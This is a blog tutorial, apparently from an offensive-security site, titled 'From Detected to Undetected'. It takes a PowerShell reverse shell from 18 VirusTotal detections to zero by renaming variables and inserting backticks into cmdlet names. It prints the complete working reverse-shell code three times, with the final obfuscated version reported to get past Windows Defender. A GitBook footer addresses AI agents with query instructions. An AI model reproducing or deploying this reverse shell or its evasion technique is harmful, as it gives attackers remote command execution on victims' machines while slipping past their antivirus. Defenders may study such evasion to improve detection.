> For the complete documentation index, see [llms.txt](https://blog.0x4.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.0x4.xyz/bypassing-windows-protection-mechanisms/from-detected-to-undetected.md).

# From Detected to Undetected

### Introduction

It's a boring weekend, and it's so cold outdoors. So let's play a little bit with VirusTotal.

What we are going to do right now is to take a detected sample of the antivirus and make it undetectable.

> VirusTotal aggregates many antivirus products and online scan engines to check for viruses that the user's own antivirus may have missed or verified against any false positives. Antivirus software vendors can receive copies of files flagged by other scans but passed by their own engine to help improve their software.

### Malicious Sample

Our sample choice is "[PowerShell reverse shell](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3).", coded by [Nikhil Mittal](https://twitter.com/nikhil_mitt).

```powershell
$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$stream = $client.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$sendback = (iex $data 2>&1 | Out-String )
$sendback2  = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()}
$client.Close()
```

First, let’s check our sample with VirusTotal for first time before doing anything.

![](/files/Y5yDD6w68TqZUwRDRd6B)

VirusTotal’s [result](https://www.virustotal.com/gui/file/da99610a62673657a8abc2891e0ab53a1a0b4f5c463797977d981e43996b33d4) showed that 18 security vendors detected it. **Let’s play now**.

### Playtime

The easiest thing we can do first. It is changing the names of the variables with random names.

```powershell
$Melia = New-Object System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (iex $Hekate 2>&1 | Out-String )
$Tyr2  = $Tyr + "PS " + (pwd).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()
```

Let’s scan again now with our friend.

![](/files/Kh8Le16xb8JZcEYrtmBh)

Fourteen security vendors were flagged as malicious on [VirusTotal](https://www.virustotal.com/gui/file/c85a7aae23e316b6c1b8dddc1a3d1075d19c4858fe2d0d3868b2cf521f7646e4). Hmm, there is progress! With a few changes, we bypassed four vendors. Let's continue.

If we go to [details](https://www.virustotal.com/gui/file/c85a7aae23e316b6c1b8dddc1a3d1075d19c4858fe2d0d3868b2cf521f7646e4/details) in VirusTotal’s report, we will find the “Powershell Info” section. We will see that VirusTotal identifies the cmdlets used in our script.

![](/files/1ljWDiC8EFYFfcO2rysQ)

### The magic of \`

Let's try to add backtick between the commands. Then we'll see if VirusTotal can catch it or not.

> PowerShell supports a set of [special character](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_special_characters?view=powershell-7.2) sequences that are used to represent characters that aren't part of the standard character set. The sequences are commonly known as *escape sequences*.
>
> Escape sequences begin with the backtick character, known as the grave accent (ASCII 96), and are case-sensitive. The backtick character can also be referred to as the *escape character*.
>
> Escape sequences are only interpreted when contained in double-quoted (`"`) strings.

| Sequence    | Description             |
| ----------- | ----------------------- |
| `` `0 ``    | Null                    |
| `` `a ``    | Alert                   |
| `` `b ``    | Backspace               |
| `` `e ``    | Escape                  |
| `` `f ``    | Form feed               |
| `` `n ``    | New line                |
| `` `r ``    | Carriage return         |
| `` `t ``    | Horizontal tab          |
| `` `u{x} `` | Unicode escape sequence |
| `` `v ``    | Vertical tab            |

So, we must be wary of where we set the backtick. We don't want to break our commands.&#x20;

When we escape, "a" with backtick means alert PowerShell (``who`ami``), and when we escape "f" with backtick means form feed (``ipcon`fig``), so both commands break. And when we escape the other character, commands don't break because then characters do not render the special meaning.

To make the picture clear to you. See the following image.

![](/files/oPReTncw7iJO6yomufPM)

Let's continue and add backtick to our code.

```powershell
$Melia = nEW`-oBj`ECt System.Net.Sockets.TCPClient("127.0.0.1",443)
$Plouton = $Melia.GetStream()
[byte[]]$bytes = 0..255|%{0}
while(($i = $Plouton.Read($bytes, 0, $bytes.Length)) -ne 0){
$Hekate = (nEW`-oBj`ECt -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
$Tyr = (I`Ex $Hekate 2>&1 | ouT`-St`RINg )
$Tyr2  = $Tyr + "PS " + (P`w`d).Path + "> "
$Lucretia = ([text.encoding]::ASCII).GetBytes($Tyr2)
$Plouton.Write($Lucretia,0,$Lucretia.Length)
$Plouton.Flush()}
$Melia.Close()
```

Upload it to VirusTotal again and scan it.

![](/files/diTLM6dDyFbpTERLh3yx)

Really, I'm disappointed! We want to play more, but "<mark style="color:green;">No security vendors and no sandboxes flagged this file as malicious</mark>.”

![](/files/2aeFKPc6JONalwpfvrrh)

As shown in the result. [VirusTotal](https://www.virustotal.com/gui/file/581a677b119ca0b7d31ab2241af151527b08bbfd4b4d8a3400bb572118687214) does not detect cmdlets that are used in our script! The backtick was helpful.

### Test Time

It's time to test our code to bypass Windows Defender and get a reverse shell. To make sure everything is working correctly.

![Victim's machine](/files/XOLYNdlvsTnY2IsmWT1U)

![Attacker's machine](/files/bRZvNrK80LzImy6z5RP3)

It works fine.

### Closing Words

Sometimes, we may not need much to do to avoid antivirus software! We could bypass all the antivirus software by changing the variable names and adding some backtick to the code like what you saw before.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.0x4.xyz/bypassing-windows-protection-mechanisms/from-detected-to-undetected.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.